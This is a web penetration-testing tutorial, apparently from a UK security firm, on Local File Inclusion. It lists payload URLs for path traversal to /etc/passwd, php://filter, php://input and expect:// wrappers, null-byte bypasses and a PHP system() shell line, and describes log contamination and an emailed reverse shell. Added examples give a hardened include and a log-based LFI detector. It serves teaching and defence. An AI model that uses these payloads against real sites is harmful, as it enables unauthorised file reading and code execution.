Local File Inclusion (LFI) — Web Application Penetration Testing

Introduction

Main Chapters

  • What is a Local File Inclusion (LFI) vulnerability?
  • Identifying LFI Vulnerabilities within Web Applications
  • PHP Wrappers
  • LFI via /proc/self/environ
  • Null Byte Technique
  • Truncation LFI Bypass
  • Log File Contamination
  • Email a Reverse Shell

What is a Local File Inclusion (LFI) vulnerability?

<?php
// The vulnerable pattern: the "file" parameter is passed to include()
// without any validation, so the caller controls which file is loaded.
$file = $_GET['file'];

if (isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}
?>
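The same page handler written defensively, as an added example that is not part of the original article. It keeps the article's `file` parameter and `pages/` directory but resolves the request through an allowlist and a `realpath()` containment check, so traversal sequences, absolute paths such as `/etc/passwd`, null bytes and `php://`, `expect://` or `zip://` wrappers never reach `include()`. The allowlist entries are assumed page names for the example.

```php
<?php
// Added example (not from the article): a hardened replacement for the
// vulnerable include() above. Two layers are applied:
//   1. an allowlist mapping the request value to a known file, so "../",
//      "/etc/passwd", "%00" and stream wrappers are never used as a path;
//   2. a realpath() containment check as a second line of defence in case
//      the allowlist is later extended carelessly (e.g. with a symlink).
// Assumption: included pages live under pages/ next to this script.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: request value => file name. Anything not listed is refused.
const ALLOWED_PAGES = [
    'home'    => 'index.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve the user-supplied page name to a safe absolute path, or null
 * when the request must be refused.
 */
function resolve_page(?string $name): ?string
{
    if ($name === null || $name === '') {
        $name = 'home';
    }
    // Reject NUL bytes explicitly (the null byte technique) instead of
    // relying on the PHP version's include() behaviour.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    if (!array_key_exists($name, ALLOWED_PAGES)) {
        return null;
    }
    $candidate = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$name]);
    $base      = realpath(PAGES_DIR);
    // realpath() returns false for a missing file; a resolved path outside
    // PAGES_DIR (through a symlink, for example) is refused as well.
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

$target = resolve_page($_GET['file'] ?? null);
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

The allowlist does the real work; the `realpath()` check only matters if someone later adds an entry pointing outside `pages/`. Disabling `allow_url_include` (and, where unused, the `expect` extension) in `php.ini` removes the remote and wrapper variants independently of the application code.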

Identifying LFI Vulnerabilities within Web Applications

/script.php?page=index.html

/script.php?page=../../../../../../../../etc/passwd

PHP Wrappers

PHP Expect Wrapper

php?page=expect://ls

/fi/?page=php://input&cmd=ls

POST request using php://input
The output from the command "ls" is rendered above the DVWA banner.

PHP php://filter

vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

Image showing the base64 encoded text at the top of the rendered page
An image showing the base64 decoded output from /etc/passwd on a UNIX / Linux system

?page=php://filter/resource=/etc/passwd

An image showing the output from /etc/passwd on a UNIX / Linux system using php://filter

PHP ZIP Wrapper LFI

LFI via /proc/self/environ

Useful Shells

<?php system('uname -a'); ?>

Null Byte Technique

vuln.php?page=/etc/passwd%00

vuln.php?page=/etc/passwd%2500

Truncation LFI Bypass

Log File Contamination

Apache / Nginx
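From the defender's side, the request patterns listed on this page (traversal in the Identifying section, the `php://` and `expect://` wrappers, `/proc/self/environ`, the `%00` and `%2500` null-byte variants, and PHP tags planted in the User-Agent for log contamination) are all visible in the Apache or Nginx access log. The following CLI script is an added example, not part of the original article: it parses combined-format log lines, percent-decodes the request target repeatedly so double-encoded payloads are caught, and reports which indicators each line triggers. The log lines are constructed for the example and the indicator names are this example's own.

```php
<?php
// Added example (not from the article): scan combined-format access log
// lines for the LFI indicators described on this page. Sample lines below
// are constructed; no real host or log is read.

declare(strict_types=1);

/** Percent-decode repeatedly so %2500 and %252e%252e are also caught. */
function deep_decode(string $s): string
{
    for ($i = 0; $i < 3; $i++) {
        $d = rawurldecode($s);
        if ($d === $s) {
            break;
        }
        $s = $d;
    }
    return $s;
}

/** Return the list of indicator names triggered by one log line. */
function lfi_indicators(string $line): array
{
    // client ident user [time] "method target proto" status bytes "referer" "agent"
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return ['unparseable'];
    }
    $path  = deep_decode($m[3]);
    $agent = deep_decode($m[5]);
    $hits  = [];
    if (preg_match('#\.\.[/\\\\]#', $path)) {
        $hits[] = 'traversal';
    }
    if (preg_match('#[?&][^=&]+=(php|expect|zip|data|phar)://#i', $path)) {
        $hits[] = 'wrapper';
    }
    if (preg_match('#/proc/self/environ|/etc/passwd|/var/log/#', $path)) {
        $hits[] = 'sensitive_path';
    }
    if (strpos($path, "\0") !== false) {
        $hits[] = 'null_byte';
    }
    if (preg_match('/<\?(php)?\s/i', $agent)) {
        $hits[] = 'ua_php_tag';
    }
    return $hits;
}

// Constructed sample log (not real traffic).
$sample_log = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /script.php?page=index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /script.php?page=../../../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2440 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /vuln.php?page=/etc/passwd%2500 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:55 +0000] "GET /index.php HTTP/1.1" 200 200 "-" "<? system(\'uname -a\'); ?>"',
];

foreach ($sample_log as $line) {
    $hits = lfi_indicators($line);
    printf("%-5s %s\n", $hits ? 'ALERT' : 'ok', $hits ? implode(',', $hits) : '-');
}
```

Run as `php lfi_log_scan.php`. The first line reports `ok`; the others report `traversal,sensitive_path`, `wrapper,sensitive_path`, `sensitive_path,null_byte` and `ua_php_tag` respectively. The User-Agent check is what makes log contamination visible: the planted PHP is written to the log before any later request tries to include it, so alerting on that write gives the earlier warning.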

Email a Reverse Shell

The above image uses the smtp-user-enum script confirming the www-data user exists on the system
The above image shows the process of sending a reverse PHP shell via SMTP using telnet
The above image shows the inclusion of www-data mail spool file containing the emailed PHP reverse shell code
The above image shows the emailed PHP reverse shell connecting to a netcat listener


Aptive Cyber Security are a UK provider of Penetration Testing Services. https://twitter.com/AptiveSec https://about.me/aptive
